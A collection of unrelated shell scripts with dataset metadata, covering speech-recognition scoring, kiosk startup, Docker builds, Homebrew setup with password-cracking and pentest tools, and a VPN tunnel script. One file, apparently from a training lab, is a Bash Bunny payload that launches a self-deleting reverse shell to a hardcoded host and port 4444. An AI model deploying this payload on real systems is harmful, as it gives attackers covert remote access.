perl scripts/makeResultsFileFrom1BestResult.pl -i $TEMP/listDecoder.1.out > $TEMP/listDecoder.result.1.ci
perl -pe 's/\s*#.*//' $TEMP/listDecoder.result.1.cs > $TEMP/listDecoder.result.cs
perl -pe 's/\s*#.*//' $TEMP/listDecoder.result.1.ci > $TEMP/listDecoder.result.ci
CIWER=`tasas $TEMP/listDecoder.result.ci -ie -f "$" -s " "`
CSWER=`tasas $TEMP/listDecoder.result.cs -ie -f "$" -s " "`
DETAILS=`bash scripts/tasasWithOptions.sh $TEMP/listDecoder.result.cs`
DETAILSCI=`bash scripts/tasasWithOptions.sh $TEMP/listDecoder.result.ci`
echo "CS: $CSWER, CI: $CIWER, DETAILS: $DETAILS, DETAILSCI: $DETAILSCI"
}
echo "Test 1"
test $LM1 $DIC1 $LAT1 $TEMP1
echo "Test 2"
test $LM2 $DIC2 $LAT2 $TEMP2
echo "Test 2 adapted"
test $LM2a $DIC2a $LAT2a $TEMP2a
echo "Test 3 adapted"
test $LM3 $DIC3 $LAT3 $TEMP3
echo "Test 4 adapted"
test $LM4 $DIC4 $LAT4 $TEMP4
echo "Test 5 adapted"
test $LM5 $DIC5 $LAT5 $TEMP5
#
# without alejandro weighting
# Test 1 (unigram)
# CS: 24.555160, CI: 23.640061
# Test 2 (bigram in-domain)
# CS: 22.191154, CI: 21.174377
# Test 2 adapted (bigram adapted)
# CS: 17.577529, CI: 16.662430
# Test 3 adapted (trigram adapted)
# CS: 16.611591, CI: 15.645653
#
# with alejandro weighting
# Test 1
# CS: 24.300966, CI: 23.512964
# Test 2
# CS: 22.000508, CI: 21.098119
# Test 2 adapted
# CS: 17.463142, CI: 16.637011
# Test 3 adapted
# CS: 16.535333, CI: 15.683782
#
# comparison with non-paragraph results:
#
# Test 1 24.631418
# Test 2 22.572445
# Test 2a 18.734113
# Test 3 (ci) 15.976106
#
#
# Test 1
# CS: 24.300966, CI: 23.512964, DETAILED: all words: 24.389934; first: 29.767442; withoutfirst: 23.715753; last: 31.511628; without last: 23.601598; without both: 22.819978; without both,ci,nopunct: 16.719835
# Test 2
# CS: 22.000508, CI: 21.098119, DETAILED: all words: 22.089476; first: 26.860465; withoutfirst: 21.461187; last: 28.837209; without last: 21.418379; without both: 20.619881; without both,ci,nopunct: 15.331207
# Test 2 adapted
# CS: 17.463142, CI: 16.637011, DETAILED: all words: 17.552110; first: 24.883721; withoutfirst: 16.595320; last: 24.767442; without last: 16.738014; without both: 15.609443; without both,ci,nopunct: 9.382623
# Test 3 adapted
# CS: 16.535333, CI: 15.683782, DETAILED: all words: 16.624301; first: 23.720930; withoutfirst: 15.667808; last: 25.116279; without last: 15.639269; without both: 14.549542; without both,ci,nopunct: 8.425596
#
#
# with context length depending on LM
# Test 1
# CS: 24.288256, CI: 23.500254, DETAILED: all words: 24.288256; first: 29.767442; withoutfirst: 23.687215; last: 31.511628; without last: 23.501712; without both: 22.803918; without both,ci,nopunct: 16.719835
# Test 2
# CS: 21.962379, CI: 21.098119, DETAILED: all words: 21.962379; first: 26.860465; withoutfirst: 21.404110; last: 28.720930; without last: 21.318493; without both: 20.603822; without both,ci,nopunct: 15.387502
# Test 2 adapted
# CS: 17.336045, CI: 16.535333, DETAILED: all words: 17.336045; first: 24.534884; withoutfirst: 16.481164; last: 24.534884; without last: 16.538242; without both: 15.529147; without both,ci,nopunct: 9.345093
# Test 3 adapted
# CS: 16.535333, CI: 15.683782, DETAILED: all words: 16.535333; first: 23.720930; withoutfirst: 15.653539; last: 25.116279; without last: 15.539384; without both: 14.533483; without both,ci,nopunct: 8.425596
# Test 4 adapted
# CS: 16.522623, CI: 15.645653, DETAILED: all words: 16.522623; first: 23.720930; withoutfirst: 15.710616; last: 24.534884; without last: 15.596461; without both: 14.661956; without both,ci,nopunct: 8.575718
# Test 5 adapted
# CS: 16.942044, CI: 16.052364, DETAILED: all words: 16.942044; first: 24.534884; withoutfirst: 16.038813; last: 24.767442; without last: 16.010274; without both: 14.983138; without both,ci,nopunct: 8.725840
#
| true
|
c97e13b32be395653d651dfa5840030b1ee783c2
|
Shell
|
jackdwyer/statusboard
|
/contrib/start_statusboard_kiosk.sh
|
UTF-8
| 319
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
TIMEOUT=30
have_internet=$(ping -c 1 yahoo.com &>/dev/null; echo $?)
if [[ ${have_internet} -eq 0 ]]; then
notify-send "have wifi, starting.."
else
notify-send "sleeping ${TIMEOUT}s; no wifi"
sleep ${TIMEOUT}s
fi
google-chrome-stable --incognito --kiosk http://localhost:8080/ &
| true
|
6c929bb74205b6d44f1b469b12f69356a098e090
|
Shell
|
VerKnowSys/svdOS
|
/etc/rc.svdsysup
|
UTF-8
| 346
| 2.859375
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
#
# ServeD system script to perform lockless filesystem binary updates
stty status '^T' 2> /dev/null
# Set shell to ignore SIGINT (2), but not children;
# shell catches SIGQUIT (3) and returns to single user.
trap : 2
trap "echo 'Update interrupted'; exit 1" 3
exec "/etc/rc.svdsysup.sh"
printf '\n\n%s\n' "Update complete."
exit 0
| true
|
5b3c89e3cfce540956c3e8dfa21cb47e69715ac6
|
Shell
|
NatsumeWeiXia/videosearch
|
/indexer/global_descriptors/run_shot_based_index_mode_1_test.sh
|
UTF-8
| 1,076
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -e
# Get list of keyframe lists
KEYFRAMES_LISTS=test_keyframe_lists.txt
ls ../test_db/*.txt > $KEYFRAMES_LISTS
# Parameters for index
GDINDEX_PATH=trained_parameters
CENTROIDS=512
LD_MODE=0
VERBOSE=1
if [ $LD_MODE -eq 0 ]; then
LD_NAME=sift
elif [ $LD_MODE -eq 1 ]; then
LD_NAME=siftgeo
else
echo "Unrecognized LD_NAME"
exit
fi
# Shot parameters
SHOT_MODE=1
SHOT_KEYF=-1
SHOT_THRESH=0.8
# Loop over each video and get shot-based index
# for each of them
for list in `cat $KEYFRAMES_LISTS`; do
# Get shot file
shot_res_file=${list%.txt}.shot_t$SHOT_THRESH
# Compose output index name
out_index=${list%.txt}.${LD_NAME}_scfv_idx_k${CENTROIDS}_shot_t${SHOT_THRESH}_n${SHOT_KEYF}_m${SHOT_MODE}
# Command line
cmd=$(echo time \
./index_dataset \
-i $list \
-o $out_index \
-r $GDINDEX_PATH \
-c $CENTROIDS \
-l $LD_MODE \
-v $VERBOSE \
-m $SHOT_MODE \
-k $SHOT_KEYF \
-s $shot_res_file)
# Write and execute command
echo $cmd
$cmd
done
| true
|
c0b3bc9cfbeec77671f7d8056e3da46280450022
|
Shell
|
alexandroskoliousis/co347
|
/src/sysmanager.sh
|
UTF-8
| 3,164
| 3.890625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# ./sysmanager.sh [start|stop|clear]
#
# Copyright (c) 2013-2014, Imperial College London
# All rights reserved.
#
# Distributed Algorithms, CO347
#
PIDDIR="`pwd`/pids"
VERBOSE=true
# If true, stdout is redirected to
# log files, one per process.
LOG=true
USAGE="./sysmanager.sh [start|stop|clear] [class] [#instances] [topology]"
daemonize () {
name=$1
# The name of a process occurs twice;
# the first occurence is used for the
# .pid file.
shift 1
(
[[ -t 0 ]] && exec 0</dev/null
if $LOG; then
[[ -t 1 ]] && exec 1>"`pwd`"/${name}.out
fi
# Always redirect stderr to a file.
[[ -t 2 ]] && exec 2>"`pwd`"/${name}.err
# close non-standard file descriptors
eval exec {3..255}\>\&-
trap '' 1 2 # ignore HUP INT in child process
exec "$@"
) &
pid=$!
disown -h $pid
$VERBOSE && echo "[DBG] ${name}'s pid is ${pid}"
echo $pid > "${PIDDIR}"/${name}.pid
return 0
}
check () {
name=$1
$VERBOSE && echo "[DBG] checking ${name}"
# Check if process $name is running
[ -s "${PIDDIR}"/$name.pid ] && (
$VERBOSE && echo "[DBG] ${name}.pid found"
pid=`cat "${PIDDIR}"/$name.pid`
ps -p $pid &>/dev/null
return $?
)
}
start () {
$VERBOSE && echo "[DBG] start ${N} instances of class ${P}"
i=1
while [ $i -le $N ]; do
name="P${i}"
# You can append arguments args[3], args[4],
# and so on after ${N}.
daemonize ${name} java ${P} ${name} ${i} ${N} $@
let i++
done
}
clear () {
$VERBOSE && echo "[DBG] clear"
[ -d "${PIDDIR}" ] && rm -f "${PIDDIR}"/*.pid
rm -rf "${PIDDIR}"
# Delete empty *.err files
ls *.err &>/dev/null
if [ $? -eq 0 ]; then
files=`ls *.err`
for f in $files; do
[ ! -s $f ] && rm -f $f
done
fi
}
stop () {
$VERBOSE && echo "[DBG] stop"
[ ! -d "${PIDDIR}" ] && return 0
ls "${PIDDIR}"/*.pid &>/dev/null
if [ $? -eq 0 ]; then
for f in "${PIDDIR}"/*.pid; do
pid=`cat "$f"`
$VERBOSE && echo "[DBG] pid is $pid"
kill -9 $pid &>/dev/null
rm -f "$f"
done
fi
clear # delete $PIDDIR.
}
#
# main ($1) ($2) ($3) (...)
#
if [ $# -lt 1 ]; then
echo $USAGE && exit 1
else
if [ $1 == "start" ]; then
if [ $# -lt 4 ]; then # Check number of arguments.
echo $USAGE
exit 1
fi
if [ ! -f "$2.class" ]; then # Check program name.
echo "error: $2.class not found"
exit 1
fi
# Check number of processes.
[ $3 -eq $3 ] >/dev/null 2>&1
if [ $? -eq 1 ]; then
echo "error: invalid argument ($3)"
exit 1
fi
if [ $3 -le 0 ]; then
echo "error: invalid argument ($3)"
exit 1
fi
if [ ! -f "$4" ]; then # Check if topology file exists.
echo $USAGE
exit
fi
elif [ $# -ne 1 ]; then
echo $USAGE
exit 1
fi
fi
C=$1 # start, stop, or clear
P=$2 # class name
N=$3 # #instances
F=$4 # network filename
shift 4
# Arguments 4, 5, 6, ... are passed to the process when it starts.
case ${C} in
"start")
[ -d "${PIDDIR}" ] || mkdir -p "${PIDDIR}"
# To begin with, start Registrar
check "P0"
if [ $? -eq 0 ]; then
echo "error: Registrar already running"
exit 1
fi
daemonize "P0" java Registrar $N $F
sleep 1
start $@ ;;
"stop" )
stop ;;
"clear")
clear;;
*)
echo $USAGE
exit 1
esac
exit 0
| true
|
eeb6682050affae567818451622e141363b20892
|
Shell
|
GitoriousLispBackup/seainit
|
/start-seainit.sh
|
UTF-8
| 571
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
#Run the seainit servers.
#Suppose that the seainit servers are stored in /sea/seainit-servers/
seainit_server_directory="/sea/seainit-servers";
seainit_log="/sea/log/seainit-log";
#Suppose that SBCL is present.
sbcl_path=$(which sbcl);
#Change to the directory, so that the daemons can all see each other.
cd $seainit_server_directory;
#Start the boostrap server:
$sbcl_path --noinform --no-userinit --non-interactive --load "$seainit_server_directory/seainit-bootstrap.lsp" #&> $seainit_log;
#Now sleep indefinitely.
while true; do sleep 60; done;
| true
|
54fa12505b6b55e88066965ad50bc13015d61a79
|
Shell
|
echoe/cpcli
|
/cpcli.sh
|
UTF-8
| 5,671
| 3.609375
| 4
|
[] |
no_license
|
#cpanel CLI simplification script for doing things in the CLI that you would rather not have to do in cPanel
#Version 0.04
#Declare our variables!
process=$1
group=$2
specify1=$3
specify2=$4
specify3=$5
specify4=$6
#These arrays are for the help process so people can figure out what is available.
arrayprocess=(mysql email ip);
arraygroupmysql=(chgpasswd createdb createusr deletedb deleteusr setusrprivs showdbs showusrs);
arraygroupemail=(createacct deleteacct chgmx chgpasswd);
arraygroupip=(changeip)
arrayspecifymysqlchgpasswd=(mysqldbusr passwd);
arrayspecifymysqlcreatedb=(dbname);
arrayspecifymysqlcreateusr=(usrname passwd);
arrayspecifymysqldeletedb=(dbname);
arrayspecifymysqldeleteusr=(mysqlusr);
arrayspecifymysqlsetusrprivs=(mysqlusr dbname "ALL PRIVILEGES");
arrayspecifymysqlshowdbs=();
arrayspecifymysqlshowusrs=();
arrayspecifyemailcreateacct=(email@domain.com passwd);
arrayspecifyemaildeleteacct=(email@domain.com);
arrayspecifyemailchgmx=(domain mxtype);
arrayspecifyemailchgpasswd=(email@domain.com passwd);
arrayspecifyipchgip=(domain newip);
#This is what controls our help, it's the meat of the program and will list the arrays above as needed.
if [[ -z $process ]]; then process="notaprocess"; fi
while [[ -z `echo ${arrayprocess[*]} "help" | grep $process` ]]; do echo "Please type one of: help ${arrayprocess[*]}"; read process; done
if [[ $process == "help" ]]; then
if [[ -z $group ]]; then group="notagroup"; fi
while [[ -z `echo ${arrayprocess[*]} | grep $group` ]]; do
echo "Hello! This is a bash script that makes some cPanel CLI commands easier to run."
echo "You can type one of these: ${arrayprocess[*]} and this script will give you the options for that group.";
read group;
done
if [[ -z $specify1 ]]; then
specify1="notspecify1";
arrayname=arraygroup$group[@];
echo "The options for $group are ${!arrayname}";
echo "Type one of those to learn about what exactly that needs.";
while [[ -z `echo ${!arrayname} | grep $specify1` ]]; do echo "Please type one of ${!arrayname}"; read specify1; done
fi
arrayname=arrayspecify$group$specify1[@];
echo "For $group $specify1, you'll need to provide ${!arrayname} in order, like this:";
echo " ./cpcli.sh $group $specify1 ${!arrayname} ";
exit 1
fi
if [[ -z $group ]]; then group="notagroup"; fi
arrayname=arraygroup$process[@];
while [[ -z `echo ${!arrayname} | grep $group` ]]; do echo "Please type one of ${!arrayname}"; read group; done
if [[ $specify1 == "" ]]; then
arrayname=arrayspecify$process$group[@];
echo "If you want to use a random password, you can use this:" `tr -cd '[:alnum:]!@#$%^&*()<>?' < /dev/urandom | fold -w20 | head -n1`
echo "Now fill out all of ${!arrayname} one at a time (press return after each option selected) in this order:";
echo ${!arrayname};
numoptions=`echo ${!arrayname} | wc -w`
if [ $numoptions -gt 0 ]; then read specify1; fi
if [ $numoptions -gt 1 ]; then read specify2; fi
if [ $numoptions -gt 2 ]; then read specify3; fi
if [ $numoptions -gt 3 ]; then read specify4; fi
fi
#This bit actually runs the processes. If statements, ahoy.
if [[ $process == "mysql" ]]; then
if [[ $group == "chgpasswd" ]]; then
tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
uapi --user=$tempuser Mysql set_password user=$specify1 password=$specify2
fi
if [[ $group == "createdb" ]]; then
tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
uapi --user=$specify1 Mysql create_database name=$specify1
fi
if [[ $group == "createusr" ]]; then
tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
uapi --user=$tempuser Mysql create_user name=$specify1 password=specify2
fi
if [[ $group == "deletedb" ]]; then
tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
uapi uapi --user=$tempuser Mysql delete_database name=$specify1
fi
if [[ $group == "deleteuser" ]]; then
tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
uapi --user=$tempuser Mysql delete_user name=$specify1
fi
if [[ $group == "setusrprivs" ]]; then
tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
uapi --user=$tempuser Mysql set_privileges_on_database user=$specify1 database=$specify2 privileges=$specify3
fi
if [[ $group == "showusrs" ]]; then
mysql -e "select distinct user from mysql.user"
fi
if [[ $group == "showdbs" ]]; then
mysql -e "show databases"
fi
fi
if [[ $process == "email" ]]; then
if [[ $group == "createacct" ]]; then
tempdomain=`echo $specify1 | cut -d'@' -f2`;
tempuser=`/scripts/whoowns $tempdomain`;
uapi --user=$tempuser Email add_pop email=$specify1 password=$specify2 skip_update_db=1
fi
if [[ $group == "deleteacct" ]]; then
tempdomain=`echo $specify1 | cut -d'@' -f2`;
tempuser=`/scripts/whoowns $tempdomain`;
uapi --user=$tempuser Email delete_pop email=$specify1
fi
if [[ $group == "chgmx" ]]; then
tempuser=`/scripts/whoowns $specify1`;
exchanger=`uapi --user=$tempuser Email list_mxs domain=$specify1 |grep domain | sed 's/ //g' | cut -d: -f2 | head -n1`;
uapi --user=$tempuser Email change_mx domain=$specify1 alwaysaccept=$specify2 exchanger=$exchanger oldexchanger=$exchanger;
fi
if [[ $group == "chgpasswd" ]]; then
tempdomain=`echo $specify1 | cut -d'@' -f2`;
tempuser=`/scripts/whoowns $tempdomain`;
uapi --user=$tempuser Email passwd_pop email=$specify1 password=$specify2 domain=$tempdomain
fi
fi
if [[ $process == "ip" ]]; then
if [[ $group == "chgip" ]]; then
/usr/local/cpanel/bin/setsiteip $specify1 $specify2
fi
fi
| true
|
1c9a50c88fbdf490d9867f7131dc99d5cb13f3a1
|
Shell
|
sofwerx/tegola-mobile
|
/android/TMControllerSvcLib/TMControllerSvc/src/main/tegola-bin-buildscripts/linux/clean_tegola_android_all.sh
|
UTF-8
| 662
| 3.296875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
@echo off
setlocal
# Usage: clean_tegola_android_all <accepts no arguments!>
SRC_MAIN_DIR=${MY_ANDROID_STUDIO_WORKSPACE}/src/github.com/terranodo/tegola-mobile/android/TMControllerSvcLib/TMControllerSvc/src/main
REQUIRED_ARGS="-b_version_props_copy_path \"${SRC_MAIN_DIR}/assets\" -b_normalized_fn_bin_output_path \"${SRC_MAIN_DIR}/res/raw\""
t_platform=(android-arm android-arm64 android-x86 android-x86_64)
for index in ${!t_platform[*]} ; do
echo clean_tegola_android_all.sh: Cleaning tegola android-platform build: ${t_platform[$index]}
eval "./clean_tegola.sh -t_platform ${t_platform[$index]} $REQUIRED_ARGS"
echo
done
| true
|
f3fff00f780c2964937567ef70247ffa9167710a
|
Shell
|
TangoMan75/bash_aliases
|
/src/symfony/sf-dump-server.sh
|
UTF-8
| 1,407
| 4.03125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
## Start project debug server
function sf-dump-server() {
local CONSOLE
local ARGUMENTS=()
local OPTARG
local OPTION
while [ "$#" -gt 0 ]; do
OPTIND=0
while getopts :h OPTION; do
case "${OPTION}" in
h) echo_warning 'sf-dump-server';
echo_label 14 ' description:'; echo_primary 'Start project debug server'
echo_label 14 ' usage:'; echo_primary 'sf-server-dump'
return 0;;
\?) echo_error "invalid option \"${OPTARG}\""
return 1;;
esac
done
if [ "${OPTIND}" -gt 1 ]; then
shift $(( OPTIND-1 ))
fi
if [ "${OPTIND}" -eq 1 ]; then
ARGUMENTS+=("$1")
shift
fi
done
if [ "${#ARGUMENTS[@]}" -gt 1 ]; then
echo_error "too many arguments (${#ARGUMENTS[@]})"
echo_label 8 'usage:'; echo_primary 'sf-server-dump'
return 1
fi
# find correct console executable
if [ -x ./app/console ]; then
CONSOLE=./app/console
elif [ -x ./bin/console ]; then
CONSOLE=./bin/console
else
echo_error 'no symfony console executable found'
return 1
fi
echo_info "php -d memory-limit=-1 ${CONSOLE} server:dump --env=dev"
php -d memory-limit=-1 ${CONSOLE} server:dump --env=dev
}
| true
|
aa81710e669b60844d2a9f30bcf8030aa8da781e
|
Shell
|
addisonbair/kubernetes-aws
|
/vpn-gateway/vpn-tunnel
|
UTF-8
| 3,474
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# chkconfig: - 24 76
#
# Description: Basic script to open VPN tunnel and create route for entire VPC
# Path variables
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# VPN Variables
VPN_TUNN="tun0"
VPN_USER="user"
VPN_HOST="connect.everyonecounts.com"
VPN_PASS="pass"
PID="/var/run/openconnect.pid"
TEMP_LOG="/tmp/status.txt"
INFO="
Usage: $(basename "$0") (start|stop|status|restart)
"
# IPtables
VPC_CIDR="172.16.0.0/16"
# Establish routing rules to set up VPN/NAT tunnel
function exec_iptables(){
# Flush all the rules in IPfilter and NAT tables
/sbin/iptables --flush
# Flush all the rules in IPfilter and nat tables
/sbin/iptables --flush
/sbin/iptables --delete-chain
/sbin/iptables --table nat --flush
/sbin/iptables --table nat --delete-chain
/sbin/iptables --table mangle --flush
/sbin/iptables --table mangle --delete-chain
# Setup postrouting rules
/sbin/iptables -A POSTROUTING -t nat -o $VPN_TUNN -j MASQUERADE
/sbin/iptables -A POSTROUTING -t nat -s $VPC_CIDR -o eth0 -j MASQUERADE
### ALLOW - VIPC CIDR
/sbin/iptables -A INPUT -p all -s $VPC_CIDR -j ACCEPT
}
# Connect to Cisco SSL VPN using passwords from stdin (passed by VPN_PASS variable created prior)
function connect_vpn(){
if [ -f $PID ]
then
printf "Openconnect is already running\n"
exit 1
else
openvpn --mktun --dev ${VPN_TUNN}
ifconfig ${VPN_TUNN} up
printf "Tunnel interface (${VPN_TUNN}) created!\n"
cp /etc/resolv.conf /etc/resolv.conf.orig
printf "Backed up /etc/resolv.conf!\n"
echo ${VPN_PASS} | openconnect -b --interface=${VPN_TUNN} --user=${VPN_USER} ${VPN_HOST} > $TEMP_LOG 2>&1
if ! grep -i "Got CONNECT response: HTTP/1.1 200 OK" $TEMP_LOG
then
printf "Openconnect failed to start!\n"
cat $TEMP_LOG
ifconfig ${VPN_TUNN} down
openvpn --rmtun --dev ${VPN_TUNN}
printf "Tunnel interface (${VPN_TUNN}) destroyed!\n"
cp /etc/resolv.conf.orig /etc/resolv.conf
printf "Restored original /etc/resolv.conf!\n"
exit 2
else
touch $PID
printf "Openconnect started!\n"
exec_iptables
printf "Routing started!\n"
fi
fi
}
# Check if openconnect is running through PID file
function check_openconnect(){
if [ -f $PID ]
then
printf "Openconnect is running!\n"
else
printf "Openconnect is stopped\n"
fi
}
# Confirm if PID file exists, then kill it immediately
function kill_openconnect(){
if [ -f $PID ]
then
rm -f $PID >/dev/null 2>&1
kill -9 $(pgrep openconnect) >/dev/null 2>&1
printf "Openconnect stopped!\n"
ifconfig ${VPN_TUNN} down
openvpn --rmtun --dev ${VPN_TUNN}
printf "Tunnel interface (${VPN_TUNN}) destroyed!\n"
cp /etc/resolv.conf.orig /etc/resolv.conf
printf "Restored original /etc/resolv.conf!\n"
else
printf "Openconnect is not running!\n"
fi
}
case "$1" in
start)
connect_vpn
;;
stop)
kill_openconnect
;;
status)
check_openconnect
;;
restart)
$0 stop
$0 start
;;
*)
echo "$INFO"
exit 0
;;
esac
| true
|
4a2f66e7f7bb787233a828a397ea744eccd32a30
|
Shell
|
packform/netlify-cms-github-oauth-provider
|
/.buildkite/build.sh
|
UTF-8
| 965
| 3.53125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# This script runs the build process for the Dockerfile defined in this repo.
# Do the following prior to run:
# 1) Set these environment variables:
# AWS_DEFAULT_REGION - for now "us-west-1"
# AWS_ACCESS_KEY_ID - for now use value in Ansible production playbooks
# AWS_SECRET_ACCESS_KEY - for now use value in Ansible production playbooks
# 2) Ensure current working directory set to root of this repo
registry=495388981531.dkr.ecr.us-west-1.amazonaws.com
set -e
echo "Logging in to the Docker image registry..."
aws ecr get-login-password | docker login --username AWS --password-stdin $registry
set +e
echo "Building and uploading image..."
sha="$(git rev-parse HEAD)"
docker build -f Dockerfile -t $registry/pp-web-oauth:$sha . --force-rm
[[ "$?" -ne "0" ]] && docker logout $registry && exit -1
docker push $registry/pp-web-oauth:$sha
[[ "$?" -ne "0" ]] && docker logout $registry && exit -1
docker logout $registry
| true
|
7e46227d1107ef03099f8f2c5a6f0735d58a2e05
|
Shell
|
zachroofsec/bash-bunny-lab
|
/payloads/LinuxReverseShell/payload.sh
|
UTF-8
| 585
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# INSPIRED BY: https://github.com/hak5/bashbunny-payloads/blob/27d63ad5a535510b20787cc03850b28bbdb727ee/payloads/library/remote_access/LinuxReverseShell/payload.txt
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
# Create mock Bash Bunny USB drive directory
BASH_BUNNY_DIR=$HOME/bash_bunny
PAYLOAD_DIR=$BASH_BUNNY_DIR/payloads/LinuxReverseShell
mkdir -p $BASH_BUNNY_DIR $PAYLOAD_DIR
# Config options
REMOTE_HOST=172.31.24.230
REMOTE_PORT=4444
bash $PAYLOAD_DIR/a.sh $REMOTE_HOST $REMOTE_PORT
| true
|
77ef17b167d73513644eff2824421d673f134485
|
Shell
|
grycap/scar
|
/examples/video-process/split-video.sh
|
UTF-8
| 247
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
echo "SCRIPT: Splitting video file $INPUT_FILE_PATH in images and storing them in $TMP_OUTPUT_DIR. One image taken each second"
ffmpeg -loglevel info -nostats -i $INPUT_FILE_PATH -q:v 1 -vf fps=1 $TMP_OUTPUT_DIR/out%03d.jpg < /dev/null
| true
|
e67d1d908c1779abeee135ab3e67aee5881c3f30
|
Shell
|
rofl0r/irix-3.x-src
|
/etc/mkswapdd.sh
|
UTF-8
| 534
| 3.625
| 4
|
[] |
no_license
|
#! /bin/sh
#
#
# This will create the swapfs_dd file in /stand
#
dev=
set `devnm /`
dev=$1
if test $dev = 'md0a'
then
echo " swapfs: ST-506 Disk Drives"
echo " swapfs: dd if=/dev/rmd0b of=/stand/swapfs_dd bs=250k count=4"
dd if=/dev/rmd0b of=/stand/swapfs_dd bs=250k count=4
elif test $dev = 'ip0a'
then
echo " swapfs: SMD Disk Drives"
echo " swapfs: dd if=/dev/rip0b of=/stand/swapfs_dd bs=250k count=4"
dd if=/dev/rip0b of=/stand/swapfs_dd bs=250k count=4
else
echo " swapfs: Unrecognized root file system"
exit 1
fi
| true
|
4544790a0973af3bb2e4181deaeff662a0b77834
|
Shell
|
rastitkac/awesome-dotfiles
|
/brew.sh
|
UTF-8
| 3,570
| 2.875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Install command-line tools using Homebrew.
# Make sure we’re using the latest Homebrew.
brew update
# Upgrade any already-installed formulae.
brew upgrade
# Save Homebrew’s installed location.
BREW_PREFIX=$(brew --prefix)
# Install GNU core utilities (those that come with macOS are outdated).
# Don’t forget to add `$(brew --prefix coreutils)/libexec/gnubin` to `$PATH`.
brew install coreutils
ln -s "${BREW_PREFIX}/bin/gsha256sum" "${BREW_PREFIX}/bin/sha256sum"
# Install some other useful utilities like `sponge`.
brew install moreutils
# Install GNU `find`, `locate`, `updatedb`, and `xargs`, `g`-prefixed.
brew install findutils
# Install GNU `sed`, overwriting the built-in `sed`.
brew install gnu-sed
# Install ZSH and zsh-completions
brew install zsh
brew install zsh-completions
# Install Mac App Store command line interface
brew install mas
# Install `wget` with IRI support.
brew install wget
# Install GnuPG to enable PGP-signing commits.
brew install gnupg
# Install more recent versions of some macOS tools.
brew install vim
brew install grep
brew install openssh
brew install screen
brew install gmp
# Install font tools.
brew tap bramstein/webfonttools
brew install sfnt2woff
brew install sfnt2woff-zopfli
brew install woff2
# Install some CTF tools; see https://github.com/ctfs/write-ups.
brew install aircrack-ng
brew install bfg
brew install binutils
brew install binwalk
brew install cifer
brew install dex2jar
brew install dns2tcp
brew install fcrackzip
brew install foremost
brew install hashpump
brew install hydra
brew install john
brew install knock
brew install netpbm
brew install nmap
brew install pngcheck
brew install socat
brew install sqlmap
brew install tcpflow
brew install tcpreplay
brew install tcptrace
brew install ucspi-tcp # `tcpserver` etc.
brew install xpdf
brew install xz
# Install other useful binaries.
brew install ack
brew install git
brew install git-lfs
brew install imagemagick --with-webp
brew install lynx
brew install p7zip
brew install pigz
brew install pv
brew install rename
brew install rlwrap
brew install ssh-copy-id
brew install tree
brew install vbindiff
brew install zopfli
brew install watch
brew install wrk
brew install sslscan
brew install tmux
brew install peco
# Development
brew install ansible
brew install awscli
brew install protobuf
brew install direnv # direnv for managing .envrc based environments
brew install go
brew install htop
brew install hub
brew install jq
brew install openssl
brew install packer
brew install pre-commit
brew install python3
brew install readline
brew install rsync
brew install telnet
brew install terraform
brew install terragrunt
brew install tmate # https://tmate.io/ Instant terminal sharing
brew install semaphoreci/tap/sem # semaphore ci
brew install websocat # websocat
brew install ripgrep # ripgrep recursively searches directories for a regex pattern
brew install libpq # install postgres tools without installing full postgres
brew install elixir # elixir programming language
# miniconda python environment manager
brew cask install miniconda
# Java 11
brew tap homebrew/cask-versions
brew cask install java
# Displayplacer https://github.com/jakehilborn/displayplacer
brew tap jakehilborn/jakehilborn
brew install displayplacer
# Spectacle
brew cask install spectacle
# casks
brew cask install aws-vault
brew cask install font-hack-nerd-font
brew cask install time-out
# Remove outdated versions from the cellar.
brew cleanup
| true
|
a240cc763ddac0081b4a109dbd04251d55c4f673
|
Shell
|
ss7pro/cloud
|
/scr.good/novnc.sh
|
UTF-8
| 719
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
. settings
setup_novnc () {
apt-get -yy novnc python-numpy
for i in 'nova-novncproxy' ; do
service novnc stop
update-rc.d -f novnc remove
mkdir -p /var/log/dt/$i
chmod 750 /var/log/dt/$i
chown nova:syslog /var/log/dt/$i
mkdir -p /etc/service/.$i
touch /etc/service/.$i/down
mv /etc/service/.$i /etc/service/$i
cat > /etc/service/$i/run <<EOF
#!/bin/bash
exec setuidgid nova $i --config-file=/etc/nova/nova.conf --web /usr/share/novnc/ 2>&1
EOF
chmod 755 /etc/service/$i/run
mkdir -p /etc/service/$i/log
cat > /etc/service/$i/log/run <<EOF
#!/bin/bash
exec setuidgid nova multilog t s16777215 n10 /var/log/dt/${i}
EOF
chmod 755 /etc/service/$i/log/run
done
}
setup_novnc
| true
|
59c6610c78e8198025ee4bec86dade63e3fbc3ef
|
Shell
|
benjamincjackson/mice_LD
|
/2_run_SHAPEIT/run_shapeit_assemble.sh
|
UTF-8
| 625
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# using the PIRs from the previous step, in combination with the (single chromosome) VCF file
# we want to run shapeit in assemble mode. Using default options, the command should look like:
#shapeit -assemble
# --input-vcf new_VCF.ox.vcf
# --input-pir myPIRsList
# -O myHaplotypes
CHR=$1
